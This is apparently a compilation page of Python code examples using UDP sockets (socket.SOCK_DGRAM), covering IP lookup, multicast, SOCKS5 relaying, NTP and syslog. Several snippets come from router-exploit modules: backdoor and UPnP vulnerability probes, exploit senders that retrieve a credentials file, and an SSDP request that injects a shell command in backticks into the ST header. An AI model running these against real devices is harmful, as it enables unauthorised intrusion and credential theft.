我们从Python开源项目中,提取了以下50个代码示例,用于说明如何使用socket.SOCK_DGRAM。
def get_iphostname():
    """Return the local hostname and the IPv4 address of the primary NIC.

    The address is read with the Linux ``SIOCGIFADDR`` ioctl, trying ``eth0``
    first and falling back to ``eno1`` when that lookup raises ``IOError``.

    Returns:
        dict: ``{'hostname': <hostname>, 'ip': <dotted-quad address>}``.

    Raises:
        IOError: if the ``eno1`` fallback lookup fails as well.
    """
    def get_ip(ifname):
        # struct.pack('256s', ...) requires bytes on Python 3; on Python 2
        # ``str`` already is ``bytes`` so this branch is skipped there.
        if not isinstance(ifname, bytes):
            ifname = ifname.encode('utf-8')
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            ifreq = fcntl.ioctl(
                sock.fileno(),
                0x8915,  # SIOCGIFADDR
                struct.pack('256s', ifname[:15])
            )
        finally:
            # Release the descriptor even when the ioctl fails, which is the
            # expected path whenever the 'eno1' fallback is needed.
            sock.close()
        # Bytes 20..23 of the returned buffer hold the packed IPv4 address.
        return socket.inet_ntoa(ifreq[20:24])

    try:
        ip = get_ip('eth0')
    except IOError:
        ip = get_ip('eno1')
    hostname = socket.gethostname()
    return {'hostname': hostname, 'ip': ip}
def setup_sockets(self):
    """Open one UDP socket per local address plus a shared multicast socket.

    For every address returned by ``get_interface_addresses`` a socket is
    bound to ``(address, self.port)`` and stored in ``self.sockets``; the
    multicast socket joins group ``self.address`` on each of those addresses
    and is finally bound to ``("", self.port)``.
    """
    self.sockets = {}
    local_ips = get_interface_addresses(self.logger)
    self.ip_addresses = local_ips

    group_sock = socket.socket(
        socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    group_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    group_sock.setsockopt(
        socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, self.ttl)

    for local_ip in local_ips:
        unicast_sock = socket.socket(
            socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
        unicast_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        # Membership request: packed group address followed by the packed
        # local interface address.
        membership = socket.inet_aton(self.address) + socket.inet_aton(local_ip)
        group_sock.setsockopt(
            socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, membership)
        self.logger.info(
            "Regestering multicast for: %s: %s" % (self.address, local_ip))
        unicast_sock.bind((local_ip, self.port))
        self.sockets[local_ip] = unicast_sock

    group_sock.bind(("", self.port))
    self.socks = list(self.sockets.values())
    self.multi_sock = group_sock
def _timed_out(self):
    """Fail the pending read and/or write task with ``socket.timeout``.

    Any overlapped I/O on a stream socket is cancelled first; then each
    waiting task has ``socket.timeout('timed out')`` thrown into it and the
    corresponding task/result slots are reset to ``None``.
    """
    # NOTE(review): block nesting was reconstructed from a flattened source;
    # confirm against the upstream file before relying on it.
    if self._rsock and self._rsock.type & socket.SOCK_STREAM:
        # Stream sockets: cancel whatever overlapped operation is in flight.
        if self._read_overlap or self._write_overlap:
            win32file.CancelIo(self._fileno)
    if self._read_task:
        if self._rsock and self._rsock.type & socket.SOCK_DGRAM:
            # Datagram sockets: drop the read registration with the notifier.
            self._notifier.clear(self, _AsyncPoller._Read)
            self._read_fn = None
        self._read_task.throw(socket.timeout('timed out'))
        self._read_result = self._read_task = None
    if self._write_task:
        if self._rsock and self._rsock.type & socket.SOCK_DGRAM:
            # Datagram sockets: drop the write registration with the notifier.
            self._notifier.clear(self, _AsyncPoller._Write)
            self._write_fn = None
        self._write_task.throw(socket.timeout('timed out'))
        self._write_result = self._write_task = None
def get_my_ip():
    """Return the IP address this machine would use for outbound traffic.

    A UDP socket is "connected" to a well-known Internet address (a Google
    DNS server; the specific address does not matter much) and the local
    address chosen for that socket is read back. No traffic is actually sent.

    Returns:
        str: the local source address, or ``"127.0.0.1"`` when a socket
        error occurs.
    """
    try:
        csock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            csock.connect(('8.8.8.8', 80))
            return csock.getsockname()[0]
        finally:
            # Close on the failure path too; previously a failed connect()
            # skipped close() and leaked the descriptor.
            csock.close()
    except socket.error:
        return "127.0.0.1"
def output(data, udp):
    """Emit the sensor backlog data (JSON text) to stdout and optionally UDP.

    Args:
        data: the text to emit; always printed to stdout.
        udp: ``"host:port"`` destination, or ``None`` to skip the UDP copy.

    The UDP copy is ``data`` followed by a newline. Any error while sending
    is printed and otherwise ignored (best effort).
    """
    print(data)
    if udp is None:
        return
    try:
        sockaddr_components = udp.split(':')
        ip = socket.gethostbyname(sockaddr_components[0])
        port = int(sockaddr_components[1])
        # sendto() needs bytes on Python 3; on Python 2 ``str`` is bytes.
        if isinstance(data, bytes):
            payload = data + b'\n'
        else:
            payload = (data + '\n').encode('utf-8')
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            sock.sendto(payload, (ip, port))
        finally:
            # One socket is created per call, so it must be closed here.
            sock.close()
    except Exception as e:
        print(e)
    return
def __init__(self, address=('localhost', SYSLOG_UDP_PORT), facility=LOG_USER, socktype=socket.SOCK_DGRAM):
    """
    Set up the handler.

    A string ``address`` selects a UNIX domain socket (for a local syslogd,
    ``SysLogHandler(address="/dev/log")`` works); any other value is used as
    an AF_INET address. ``facility`` defaults to LOG_USER. A stream
    ``socktype`` is connected immediately.
    """
    logging.Handler.__init__(self)

    self.address = address
    self.facility = facility
    self.socktype = socktype

    is_unix_path = isinstance(address, basestring)
    self.unixsocket = 1 if is_unix_path else 0
    if is_unix_path:
        self._connect_unixsocket(address)
    else:
        self.socket = socket.socket(socket.AF_INET, socktype)
        # Datagram sockets stay unconnected; only streams connect up front.
        if socktype == socket.SOCK_STREAM:
            self.socket.connect(address)

    self.formatter = None
def __init__(self, family=socket.AF_INET, type=socket.SOCK_STREAM, proto=0, *args, **kwargs):
    """Create the socket and reset all proxy-related state.

    Raises:
        ValueError: if ``type`` is neither SOCK_STREAM nor SOCK_DGRAM.
    """
    supported_types = (socket.SOCK_STREAM, socket.SOCK_DGRAM)
    if type not in supported_types:
        raise ValueError(
            "Socket type must be stream or datagram, not {!r}".format(type))

    super(socksocket, self).__init__(family, type, proto, *args, **kwargs)

    # TCP connection to keep UDP relay alive
    self._proxyconn = None

    # Fall back to an all-None 6-tuple when no default proxy is configured.
    self.proxy = (self.default_proxy if self.default_proxy
                  else (None, None, None, None, None, None))
    self.proxy_sockname = None
    self.proxy_peername = None
    self._timeout = None
def sendto(self, bytes, *args, **kwargs):
    """Send a datagram, prefixing it with a SOCKS5 UDP header.

    Non-datagram sockets delegate straight to the parent ``sendto``. The
    last positional argument is the destination address; anything before it
    is passed through as flags.

    Returns:
        Bytes sent as reported by ``send`` minus the header length.
    """
    parent = super(socksocket, self)
    if self.type != socket.SOCK_DGRAM:
        return parent.sendto(bytes, *args, **kwargs)

    if not self._proxyconn:
        self.bind(("", 0))

    destination, send_flags = args[-1], args[:-1]

    packet_header = BytesIO()
    packet_header.write(b"\x00\x00")  # RSV (reserved)
    packet_header.write(b"\x00")      # STANDALONE (fragment number 0)
    self._write_SOCKS5_address(destination, packet_header)

    datagram = packet_header.getvalue() + bytes
    sent = parent.send(datagram, *send_flags, **kwargs)
    return sent - packet_header.tell()
def recvfrom(self, bufsize, flags=0):
    """Receive a datagram and strip its SOCKS5 UDP header.

    Non-datagram sockets delegate straight to the parent ``recvfrom``.

    Returns:
        ``(payload, (host, port))`` where the address is the one read from
        the SOCKS5 header.

    Raises:
        NotImplementedError: the fragment byte of the header is non-zero.
        socket.error: (EAGAIN) the sender does not match ``proxy_peername``.
    """
    parent = super(socksocket, self)
    if self.type != socket.SOCK_DGRAM:
        return parent.recvfrom(bufsize, flags)

    if not self._proxyconn:
        self.bind(("", 0))

    # Ask for 1024 extra bytes so the header does not eat into ``bufsize``.
    raw = parent.recv(bufsize + 1024, flags)
    stream = BytesIO(raw)
    stream.seek(2, SEEK_CUR)  # skip the two reserved bytes
    fragment = stream.read(1)
    if ord(fragment):
        raise NotImplementedError("Received UDP packet fragment")

    fromhost, fromport = self._read_SOCKS5_address(stream)

    if self.proxy_peername:
        peerhost, peerport = self.proxy_peername
        # A peer port of 0 accepts any source port.
        if not (fromhost == peerhost and peerport in (0, fromport)):
            raise socket.error(EAGAIN, "Packet filtered")

    payload = stream.read(bufsize)
    return (payload, (fromhost, fromport))
def source_interface(address, port=80, ip_version=None):
    """Figure out what local interface is being used to reach an address.

    Args:
        address: destination host used to select the route.
        port: destination port for the UDP "connect" (default 80).
        ip_version: ``6`` selects AF_INET6; anything else selects AF_INET.

    Returns:
        A tuple ``(address, interface_name)``, or ``(None, None)`` when the
        connect fails or no interface name is found for the local address.
    """
    sock = socket.socket(
        socket.AF_INET6 if ip_version == 6 else socket.AF_INET,
        socket.SOCK_DGRAM)
    try:
        try:
            sock.connect((address, port))
        except socket.error:
            return (None, None)
        interface_address = sock.getsockname()[0]
    finally:
        # Previously the early return on connect failure skipped close().
        sock.close()

    interface_name = address_interface(interface_address,
                                       ip_version=ip_version)
    if interface_name:
        return (interface_address, interface_name)
    return (None, None)
def get_current_SNTP_time(sntp_server=SNTP_SERVER):
    """Acquire the current time in UTC seconds from an SNTP server.

    Thanks to Simon Foster's "Simple (very) SNTP client" recipe:
    http://code.activestate.com/recipes/117211/

    Args:
        sntp_server: host name or address of the server to query.

    Returns:
        The 11th 32-bit word of the reply minus ``TIME_1970``, or ``None``
        when the query fails or the reply is empty.
    """
    try:
        client = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            # 48-byte request; a bytes literal works on Python 2 and 3.
            data = b'\x1b' + 47 * b'\0'
            client.sendto(data, (sntp_server, SNTP_PORT))
            data, address = client.recvfrom(1024)
        finally:
            # The socket was never closed before; release it on every path.
            client.close()
        if data:
            utc_secs = struct.unpack('!12I', data)[10]
            utc_secs -= TIME_1970
            return utc_secs
    except Exception:
        print("get_current_SNTP_time failed: %s" % (sntp_server,))
        return None
    return None

# ==============================================================================
# OS_set_datetime
# ==============================================================================
def getipaddr(self, ifname='eth0'):
    """Best-effort lookup of this host's IPv4 address.

    First resolves the host's fully qualified name. If that yields the
    loopback address (or fails), the address of ``ifname`` is read with the
    ``SIOCGIFADDR`` ioctl instead.

    Args:
        ifname: interface to query in the fallback path.

    Returns:
        str: the address found, or ``'127.0.0.1'`` when both lookups fail.
    """
    import socket
    import struct
    ret = '127.0.0.1'
    try:
        ret = socket.gethostbyname(socket.getfqdn(socket.gethostname()))
    except Exception:
        # Deliberate best effort; unlike a bare ``except`` this no longer
        # swallows KeyboardInterrupt/SystemExit.
        pass
    if ret == '127.0.0.1':
        try:
            import fcntl
            # struct.pack('256s', ...) requires bytes on Python 3.
            name = ifname if isinstance(ifname, bytes) else ifname.encode('utf-8')
            s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
            try:
                ret = socket.inet_ntoa(fcntl.ioctl(
                    s.fileno(),
                    0x8915,  # SIOCGIFADDR
                    struct.pack('256s', name[:15]))[20:24])
            finally:
                s.close()
        except Exception:
            pass
    return ret
def handle_event(self, sock, fd, event):
    """Handle an event-loop notification for the DNS socket.

    Events for any socket other than ``self._sock`` are ignored. On
    ``POLL_ERR`` the socket is closed and replaced by a fresh non-blocking
    UDP socket registered for ``POLL_IN``. Otherwise one datagram is read
    and passed to ``self._handle_data`` unless its sender is unknown.
    """
    if sock != self._sock:
        return
    if event & eventloop.POLL_ERR:
        logging.error('dns socket err')
        self._loop.remove(self._sock)
        self._sock.close()
        # TODO when dns server is IPv6
        self._sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,
                                   socket.SOL_UDP)
        self._sock.setblocking(False)
        self._loop.add(self._sock, eventloop.POLL_IN, self)
    else:
        data, addr = sock.recvfrom(1024)
        # The full sender address is compared here.
        # NOTE(review): presumably self._servers holds (host, port) tuples
        # in this variant - confirm.
        if addr not in self._servers:
            # logging.warn is a deprecated alias of logging.warning.
            logging.warning('received a packet other than our dns')
            return
        self._handle_data(data)
def _socket_bind_addr(self, sock, af):
    """Bind ``sock`` to the configured local address for family ``af``.

    Uses ``self._bind`` for AF_INET and ``self._bindv6`` for AF_INET6, with
    any ``"::ffff:"`` text removed. Nothing is bound when no address is
    configured, when the address is in ``self._ignore_bind_list``, or when
    it resolves to a different address family. A failed bind is logged and
    otherwise ignored.
    """
    bind_addr = ''
    if self._bind and af == socket.AF_INET:
        bind_addr = self._bind
    elif self._bindv6 and af == socket.AF_INET6:
        bind_addr = self._bindv6

    # NOTE(review): this statement's nesting level was reconstructed from a
    # flattened source; it is assumed to run for both branches - confirm.
    bind_addr = bind_addr.replace("::ffff:", "")
    if bind_addr in self._ignore_bind_list:
        bind_addr = None
    if bind_addr:
        local_addrs = socket.getaddrinfo(bind_addr, 0, 0,
                                         socket.SOCK_DGRAM, socket.SOL_UDP)
        if local_addrs[0][0] == af:
            logging.debug("bind %s", bind_addr)
            try:
                sock.bind((bind_addr, 0))
            except Exception:
                # logging.warn is a deprecated alias of logging.warning.
                logging.warning("bind %s fail", bind_addr)
def get_NTP_time():
    """Query ``NTP_HOST`` over UDP and return the adjusted timestamp.

    Returns:
        The 32-bit big-endian value at bytes 40..43 of the reply minus
        ``NTP_DELTA``, or ``None`` when no reply arrives within 2 seconds
        (or the receive fails with ``OSError``).
    """
    NTP_QUERY = bytearray(48)
    NTP_QUERY[0] = 0x1b
    addr = socket.getaddrinfo(NTP_HOST, NTP_PORT)[0][-1]
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    msg = None
    try:
        # Send errors still propagate to the caller, but the socket is now
        # closed on that path as well.
        s.sendto(NTP_QUERY, addr)

        # Setting timeout for receiving data. Because we're using UDP,
        # there's no need for a timeout on send.
        s.settimeout(2)
        try:
            msg = s.recv(48)
        except OSError:
            pass
    finally:
        s.close()

    if msg is None:
        return None

    import struct
    val = struct.unpack("!I", msg[40:44])[0]
    return val - NTP_DELTA
def ack_loop():
    """Wait up to 5 seconds for a JSON ACK datagram on UDP port 9033.

    ``state['ack']`` is set to ``True`` when the received JSON object has a
    truthy ``'ack'`` member, and to ``False`` when it is falsy or when no
    datagram arrives before the timeout.
    """
    listen_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        listen_sock.bind(('', 9033))
        listen_sock.settimeout(5)  # 5 second timeout

        # wait for an ack
        try:
            data, addr = listen_sock.recvfrom(2048)
            if json.loads(data)['ack']:
                print('Got ack from %s' % (addr,))
                state['ack'] = True
            else:
                state['ack'] = False
        except socket.timeout:
            print('Didn\'t get ACK from client')
            state['ack'] = False
    finally:
        # Release port 9033 so a later call can bind it again.
        listen_sock.close()
def bind(self, addr, port, tos, ttl, df):
    """Create the UDP socket, apply IP options and bind it.

    Args:
        addr: local address to bind to.
        port: local port to bind to.
        tos: value for the IP_TOS socket option.
        ttl: value for the IP_TTL socket option.
        df: when true, request the do-not-fragment behaviour where the
            platform supports it; when false, explicitly disable it on
            Linux.
    """
    # Numeric option values as used by the original code.
    ip_mtu_discover = 10    # Linux IP_MTU_DISCOVER
    ip_pmtudisc_dont = 0    # Linux IP_PMTUDISC_DONT
    ip_pmtudisc_do = 2      # Linux IP_PMTUDISC_DO
    ip_dontfragment = 14    # Windows IP_DONTFRAGMENT

    log.debug(
        "bind(addr=%s, port=%d, tos=%d, ttl=%d)", addr, port, tos, ttl)
    self.socket = socket.socket(
        socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
    self.socket.setsockopt(socket.IPPROTO_IP, socket.IP_TOS, tos)
    self.socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
    self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    self.socket.bind((addr, port))

    # sys.platform is "linux2" on Python 2 but "linux" on Python 3.3+, so an
    # exact comparison with "linux2" never matched on Python 3.
    on_linux = sys.platform.startswith("linux")

    if df:
        if on_linux:
            self.socket.setsockopt(
                socket.SOL_IP, ip_mtu_discover, ip_pmtudisc_do)
        elif sys.platform == "win32":
            self.socket.setsockopt(socket.SOL_IP, ip_dontfragment, 1)
        elif sys.platform == "darwin":
            log.error("do-not-fragment can not be set on darwin")
        else:
            log.error("unsupported OS, ignore do-not-fragment option")
    else:
        if on_linux:
            self.socket.setsockopt(
                socket.SOL_IP, ip_mtu_discover, ip_pmtudisc_dont)
def __init__(self):
    """
    Start the client, subscribe to "test" and start the loop.

    The broker address is the local machine's own IP, found by "connecting"
    a UDP socket to a public DNS server and reading back the local address.
    Note that this constructor does not return until ``loop_forever()``
    does.
    """
    super(MQSUB, self).__init__()

    # super().on_connect = self.on_connect
    # super().on_message = self.on_message

    self.start = 0
    self.end = 0
    self.message_count = 0

    # determine current IP address of the local computer
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        # use the google dns
        s.connect(('8.8.8.8', 0))
        self.ip_address = s.getsockname()[0]
    finally:
        # The probe socket is only needed for the lookup; it was previously
        # left open for the lifetime of the object.
        s.close()

    self.connect(self.ip_address, 1883, 60)
    self.subscribe("test", 0)
    self.loop_forever()
def onready(notify_socket, timeout):
    """Wait for systemd style notification on the socket.

    :param notify_socket: local socket address
    :type notify_socket: string
    :param timeout: socket timeout
    :type timeout: float
    :returns: 0 service ready
              1 service not ready
              2 timeout occurred
    """
    sock = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
    try:
        sock.settimeout(timeout)
        # bind() sits inside the try so the socket is closed if it fails.
        sock.bind(_abstractify(notify_socket))
        msg = sock.recv(512)
    except socket.timeout:
        return 2
    finally:
        sock.close()

    # recv() returns bytes on Python 3, so compare against a bytes literal
    # (identical to the str literal on Python 2).
    if b'READY=1' in msg:
        return 0
    else:
        return 1
def sendto(self, bytez, *args, **kwargs):
    """Send a datagram, prefixing it with a SOCKS5 UDP header.

    Non-datagram sockets delegate straight to ``_BaseSocket.sendto``. The
    last positional argument is the destination address; anything before it
    is passed through as flags.

    Returns:
        Bytes sent as reported by ``send`` minus the header length.
    """
    if self.type != socket.SOCK_DGRAM:
        return _BaseSocket.sendto(self, bytez, *args, **kwargs)

    if not self._proxyconn:
        self.bind(("", 0))

    destination, send_flags = args[-1], args[:-1]

    packet_header = BytesIO()
    packet_header.write(b"\x00\x00")  # reserved bytes
    packet_header.write(b"\x00")      # standalone datagram (fragment 0)
    self._write_socks5_address(destination, packet_header)

    datagram = packet_header.getvalue() + bytez
    sent = _BaseSocket.send(self, datagram, *send_flags, **kwargs)
    return sent - packet_header.tell()
def recvfrom(self, bufsize, flags=0):
    """Receive a datagram and strip its SOCKS5 UDP header.

    Non-datagram sockets delegate straight to ``_BaseSocket.recvfrom``.

    Returns:
        ``(payload, (host, port))`` where the address is the one read from
        the SOCKS5 header and the payload is everything after it.

    Raises:
        NotImplementedError: the fragment byte of the header is non-zero.
        socket.error: (EAGAIN) the sender does not match ``proxy_peername``.
    """
    if self.type != socket.SOCK_DGRAM:
        return _BaseSocket.recvfrom(self, bufsize, flags)

    if not self._proxyconn:
        self.bind(("", 0))

    raw = _BaseSocket.recv(self, bufsize, flags)
    stream = BytesIO(raw)
    stream.seek(+2, SEEK_CUR)  # skip the two reserved bytes
    fragment = stream.read(1)
    if ord(fragment):
        raise NotImplementedError("Received UDP packet fragment")

    fromhost, fromport = _read_socks5_address(stream)

    if self.proxy_peername:
        peerhost, peerport = self.proxy_peername
        # A peer port of 0 accepts any source port.
        if not (fromhost == peerhost and peerport in (0, fromport)):
            raise socket.error(EAGAIN, "Packet filtered")

    payload = stream.read()
    return payload, (fromhost, fromport)
def activate(self):
    """Read the optional IP/port plugin arguments and open the UDP socket.

    ``self.args[0]``, when present, overrides ``self.ip``; ``self.args[1]``,
    when present, overrides ``self.port`` (converted to ``int``). The socket
    is stored in ``self.server``; it is created but not bound here.
    """
    # print() with a single pre-formatted argument produces the same output
    # on Python 2 and 3; the original print statements were Python 2 only.
    print("udp_server plugin")
    print(self.args)

    if len(self.args) > 0:
        self.ip = self.args[0]
    if len(self.args) > 1:
        self.port = int(self.args[1])

    # init network
    # Doubled spaces reproduce the original comma-separated print output.
    print("Selecting raw UDP streaming. IP:  %s , port:  %s"
          % (self.ip, self.port))

    self.server = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    print("Server started on port " + str(self.port))
def check(self):
    """Probe UDP port 53413 on ``self.target`` and inspect the reply.

    Eight zero bytes are sent; the target is reported as vulnerable when
    the reply ends with one of two known byte sequences.

    Returns:
        bool: ``True`` if a matching reply was received, ``False``
        otherwise (including on timeout or any send/receive error).
    """
    # Bytes literals: recv() returns bytes on Python 3, and on Python 2
    # these are identical to the former str literals.
    signatures = (
        b"\xD0\xA5Login:",
        b"\x00\x00\x00\x05\x00\x01\x00\x00\x00\x00\x01\x00\x00",
    )
    response = b""
    payload = b"\x00" * 8

    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    sock.settimeout(10.0)
    try:
        sock.sendto(payload, (self.target, 53413))
        response = sock.recv(1024)
    except Exception:
        # Best effort: no reply simply means "not vulnerable".
        pass
    finally:
        sock.close()

    if response.endswith(signatures):
        return True  # target is vulnerable

    return False  # target is not vulnerable
def run(self):
    """Send ``self.payload`` to UDP port 69 on the target and report.

    Success is reported when the reply contains ``UseUserCredential``;
    every other outcome (no reply, empty reply, marker missing) is reported
    as a failure.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.settimeout(10)

        print_status("Sending payload")
        sock.sendto(self.payload, (self.target, 69))

        try:
            response = sock.recv(2048)
        except Exception:
            print_error("Exploit failed - device seems to be not vulnerable")
            return
    finally:
        # The socket was never closed before; release it on every path.
        sock.close()

    if len(response):
        # Bytes literal: recv() returns bytes on Python 3 (same as the str
        # literal on Python 2).
        if b"UseUserCredential" in response:
            print_success("Exploit success - file {}".format("SPDefault.cnf.xml"))
            print_info(response)
        else:
            print_error("Exploit failed - credentials not found in response")
    else:
        print_error("Exploit failed - empty response")
def run(self):
    """Send ``self.payload`` to UDP port 43690 on the target and report.

    Any non-empty reply is reported as success and printed; a receive error
    or timeout is reported as failure.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    try:
        sock.settimeout(10)

        print_status("Sending exploit payload")
        sock.sendto(self.payload, (self.target, 43690))

        try:
            print_status("Waiting for response")
            response = sock.recv(1024)
        except Exception:
            print_error("Exploit failed - device seems to be not vulnerable")
            return
    finally:
        # The socket was never closed before; release it on every path.
        sock.close()

    if len(response):
        print_success("Exploit success")
        print_info(response)
def execute(self, cmd):
    """Send an SSDP M-SEARCH request embedding ``cmd`` to the target.

    The request goes to UDP port 1900 on ``self.target``. No reply is read.

    Args:
        cmd: text placed between backticks in the ``ST`` header.

    Returns:
        str: always the empty string; socket errors are ignored.
    """
    buf = ("M-SEARCH * HTTP/1.1\r\n"
           "Host:239.255.255.250:1900\r\n"
           "ST:uuid:`" + cmd + "`\r\n"
           "Man:\"ssdp:discover\"\r\n"
           "MX:2\r\n\r\n")
    # send() requires bytes on Python 3; on Python 2 ``str`` is bytes.
    if not isinstance(buf, bytes):
        buf = buf.encode("utf-8")

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            sock.settimeout(10)
            sock.connect((self.target, 1900))
            sock.send(buf)
        finally:
            # Previously a failed connect()/send() skipped close().
            sock.close()
    except socket.error:
        pass

    return ""
def check(self):
    """Send an SSDP root-device M-SEARCH to the target and inspect the reply.

    Returns:
        bool: ``True`` when the reply contains ``Linux, UPnP/1.0, DIR-``,
        ``False`` otherwise (including on timeout or any error).
    """
    buf = (b"M-SEARCH * HTTP/1.1\r\n"
           b"Host:239.255.255.250:1900\r\n"
           b"ST:upnp:rootdevice\r\n"
           b"Man:\"ssdp:discover\"\r\n"
           b"MX:2\r\n\r\n")

    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            sock.settimeout(10)
            sock.connect((self.target, 1900))
            sock.send(buf)
            response = sock.recv(65535)
        finally:
            # Previously an exception (e.g. the recv timeout) skipped close().
            sock.close()
    except Exception:
        return False  # target is not vulnerable

    # Bytes literal: recv() returns bytes on Python 3 (same as the str
    # literal on Python 2).
    if b"Linux, UPnP/1.0, DIR-" in response:
        return True  # target is vulnerable

    return False  # target is not vulnerable
def log_event(event_tuple):
    """Format one event and write it to the configured log destinations.

    ``event_tuple`` is indexed as: ``[0]`` seconds, ``[1]`` microseconds,
    ``[2]`` source IP, ``[4]`` destination IP; everything from index 2 on is
    written into the log line. Events whose source or destination IP is in
    ``WHITELIST`` are dropped.

    Destinations, per ``config``: the local event log (unless
    ``DISABLE_LOCAL_LOG_STORAGE``), a remote UDP ``LOG_SERVER`` given as
    ``"host:port"``, or stdout when neither of the other two is in use.
    ``OSError``/``IOError`` are swallowed (traceback printed when
    ``SHOW_DEBUG`` is set).
    """
    try:
        sec, usec, src_ip, dst_ip = event_tuple[0], event_tuple[1], event_tuple[2], event_tuple[4]
        if not any(_ in WHITELIST for _ in (src_ip, dst_ip)):
            localtime = "%s.%06d" % (time.strftime(TIME_FORMAT, time.localtime(int(sec))), usec)
            event = "%s %s %s\n" % (safe_value(localtime), safe_value(config.SENSOR_NAME), " ".join(safe_value(_) for _ in event_tuple[2:]))
            if not config.DISABLE_LOCAL_LOG_STORAGE:
                handle = get_event_log_handle(sec)
                os.write(handle, event)
            if config.LOG_SERVER:
                remote_host, remote_port = config.LOG_SERVER.split(':')
                s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
                try:
                    s.sendto("%s %s" % (sec, event), (remote_host, int(remote_port)))
                finally:
                    # A socket is created per event; close it so descriptors
                    # do not pile up until garbage collection.
                    s.close()
            if config.DISABLE_LOCAL_LOG_STORAGE and not config.LOG_SERVER:
                sys.stdout.write(event)
                sys.stdout.flush()
    except (OSError, IOError):
        if config.SHOW_DEBUG:
            traceback.print_exc()
def __init__(self, port=17935, clients=None, broadcast=True):
    """Build the announcement message, open the sockets and start the thread.

    Args:
        port: port number embedded in the announcement.
        clients: list stored as ``self.clients``; a new empty list is used
            when omitted.
        broadcast: when true, also open a socket with ``SO_BROADCAST`` set.

    ``self.msg`` is the NUL-joined fields ``PyritServerAnnouncement``, an
    empty field and the port, followed by the SHA-1 digest of those bytes.
    """
    util.Thread.__init__(self)
    self.port = port
    # A ``[]`` default would be one list shared by every instance.
    self.clients = [] if clients is None else clients

    # Built as bytes so hashlib accepts it on Python 3; on Python 2 the
    # result is identical to the former str concatenation.
    msg = b'\x00'.join([b"PyritServerAnnouncement",
                        b'',
                        str(port).encode('ascii')])
    md = hashlib.sha1()
    md.update(msg)
    self.msg = msg + md.digest()

    self.ucast_sckt = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    if broadcast:
        self.bcast_sckt = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        self.bcast_sckt.bind(('', 0))
        self.bcast_sckt.setsockopt(socket.SOL_SOCKET,
                                   socket.SO_BROADCAST, 1)
    else:
        self.bcast_sckt = None

    self.setDaemon(True)
    self.start()
def _systemd_notify_once():
    """Tell systemd, at most once, that the service is ready.

    systemd passes the notification socket name in the NOTIFY_SOCKET
    environment variable. After a successful ``READY=1`` message the
    variable is deleted so later calls become no-ops. Failures are logged
    at debug level and otherwise ignored.
    """
    target = os.getenv('NOTIFY_SOCKET')
    if not target:
        return

    if target.startswith('@'):
        # abstract namespace socket
        target = '\0%s' % target[1:]

    with contextlib.closing(
            socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)) as notifier:
        try:
            notifier.connect(target)
            notifier.sendall(b'READY=1')
            del os.environ['NOTIFY_SOCKET']
        except EnvironmentError:
            LOG.debug("Systemd notification failed", exc_info=True)
def getIfConfig(ifname):
    """Collect address information for a network interface via ioctls.

    Args:
        ifname: interface name passed to ``_ifinfo`` for every query.

    Returns:
        dict: always contains ``'ifname'``; ``'addr'``, ``'brdaddr'``,
        ``'hwaddr'`` and ``'netmask'`` are added for each query that
        succeeds. Querying stops at the first failure, so later keys may be
        missing.
    """
    ifreq = {'ifname': ifname}
    infos = {}
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

    # request codes defined in /usr/include/linux/sockios.h on linux 2.6
    infos['addr'] = 0x8915     # SIOCGIFADDR
    infos['brdaddr'] = 0x8919  # SIOCGIFBRDADDR
    infos['hwaddr'] = 0x8927   # SIOCGIFHWADDR
    infos['netmask'] = 0x891b  # SIOCGIFNETMASK

    try:
        for k, v in infos.items():
            ifreq[k] = _ifinfo(sock, v, ifname)
    except Exception:
        # Deliberate best effort; unlike a bare ``except`` this no longer
        # swallows KeyboardInterrupt/SystemExit.
        pass
    finally:
        sock.close()

    return ifreq
def client():
    """Send one line of user input to the server over UDP and print the reply.

    The text read from stdin is encoded with the ``ENCODE`` codec and sent
    to ``(HOST, PORT)``; the reply is decoded with the same codec and
    printed together with the sender's address.
    """
    text = input("Digite algum texto:\n")  # read the text to send
    data = text.encode(ENCODE)             # text -> bytes

    dest = (HOST, PORT)                    # destination address and port

    # The context manager closes the socket even if send/receive raises.
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as sock:
        sock.sendto(data, dest)

        # Show the local address the OS assigned to this socket.
        print(sock.getsockname())

        data, address = sock.recvfrom(MAX_BYTES)  # wait for the reply

    text = data.decode(ENCODE)             # bytes -> text
    print(address, text)
def server():
    """Run a UDP server that answers each datagram with its byte count.

    Binds to ``(HOST, PORT)`` and loops forever: each received datagram is
    decoded with the ``ENCODE`` codec and printed with the sender's address,
    then a reply stating the number of bytes received is sent back.
    """
    orig = (HOST, PORT)

    # The context manager releases the bound socket when the loop is left
    # through an exception (e.g. KeyboardInterrupt).
